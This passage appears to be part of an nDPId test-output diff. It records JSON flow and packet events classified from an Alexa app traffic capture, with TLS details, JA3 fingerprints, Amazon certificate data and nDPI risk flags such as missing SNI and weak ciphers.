-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1490976196223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196223,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Y0xAAEAG+qKsECrYNFXRj5ZTAbu3TOm6AAAAAKAC\/\/+mLwAAAgQFtAQCCAoA9or2AAAAAAEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1490976196257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196257,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7llOp3LO0t0zpu6AScSBd6wAAAgQFtAQCCApt5QucAPaK9gEDAwg="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1490976196259,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196259,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0Y01AAEAG+qmsECrYNFXRj5ZTAbu3TOm7qdyztYAQAVf8fgAAAQEICgD2ivlt5Quc"} -01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196223,"flow_last_seen":1490976196261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196261,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01133{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2950,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196223,"flow_last_seen":1490976196300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1490976196300,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01606{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2952,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976196223,"flow_last_seen":1490976196301,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3656,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1490976196301,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195983,"flow_last_seen":1490976195983,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195983,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2865,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1490976195983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195983,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8wa5AAEAGL16sECrYNFQ+c6O4AbsdU0twAAAAAKAC\/\/9kRAAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195984,"flow_last_seen":1490976195984,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195984,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2866,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1490976195984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195984,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8CnNAAEAG5pmsECrYNFQ+c6O5Abv6a4CtAAAAAKAC\/\/9R7QAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2867,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195985,"flow_last_seen":1490976195985,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195985,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2867,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1490976195985,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195985,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8MZ1AAEAGv2+sECrYNFQ+c6O6AbtYObtDAAAAAKAC\/\/+5iAAAAgQFtAQCCAoA9oreAAAAAAEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":2,"flow_last_seen":1490976196000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196000,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7kDZGUl+muArqAScSCFQwAAAgQFtAQCCAps+oX0APaK3gEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2870,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":1490976196001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196001,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7jUvy2sHVNLcaAScSD3DwAAAgQFtAQCCAps+oycAPaK3gEDAwg="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_packet_id":3,"flow_last_seen":1490976196002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196002,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0CnRAAEAG5qCsECrYNFQ+c6O5Abv6a4CuA2RlJoAQAVcj2AAAAQEICgD2iuBs+oX0"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":1490976196003,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196003,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0wa9AAEAGL2WsECrYNFQ+c6O4AbsdU0tx1L8trYAQAVeVpAAAAQEICgD2iuBs+oyc"} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195984,"flow_last_seen":1490976196003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196003,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195983,"flow_last_seen":1490976196005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196005,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":2,"flow_last_seen":1490976196008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196008,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPww0VD5zrBAq2AG7o7r33SsOWDm7RKAScSApGwAAAgQFtAQCCAps+o9VAPaK3gEDAwg="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_packet_id":3,"flow_last_seen":1490976196009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MZ5AAEAGv3asECrYNFQ+c6O6AbtYObtE990rD4AQAVfHrwAAAQEICgD2iuBs+o9V"} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195985,"flow_last_seen":1490976196010,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976196010,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196016,"flow_last_seen":1490976196016,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196016,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1490976196016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196016,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8LWlAAEAG4smsECrYNu8csuLAAbtkEKeIAAAAAKAC\/\/+hiQAAAgQFtAQCCAoA9orhAAAAAAEDAwg="} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195984,"flow_last_seen":1490976196033,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196033,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195984,"flow_last_seen":1490976196034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196034,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195985,"flow_last_seen":1490976196037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2890,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195985,"flow_last_seen":1490976196038,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196038,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2892,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195983,"flow_last_seen":1490976196039,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196039,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2894,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195983,"flow_last_seen":1490976196041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196041,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2910,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1490976196075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976196075,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIa5AAOcGR5A27xyyrBAq2AG74sBbwNFvZBCniXASH\/4cPAAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2911,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1490976196075,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976196075,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoLWpAAEAG4tysECrYNu8csuLAAbtkEKeJW8DRcFAQAVdmrQAA"} +00959{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2913,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196016,"flow_last_seen":1490976196079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196079,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01107{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2929,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196016,"flow_last_seen":1490976196143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196143,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976071237,"flow_last_seen":1490976075957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 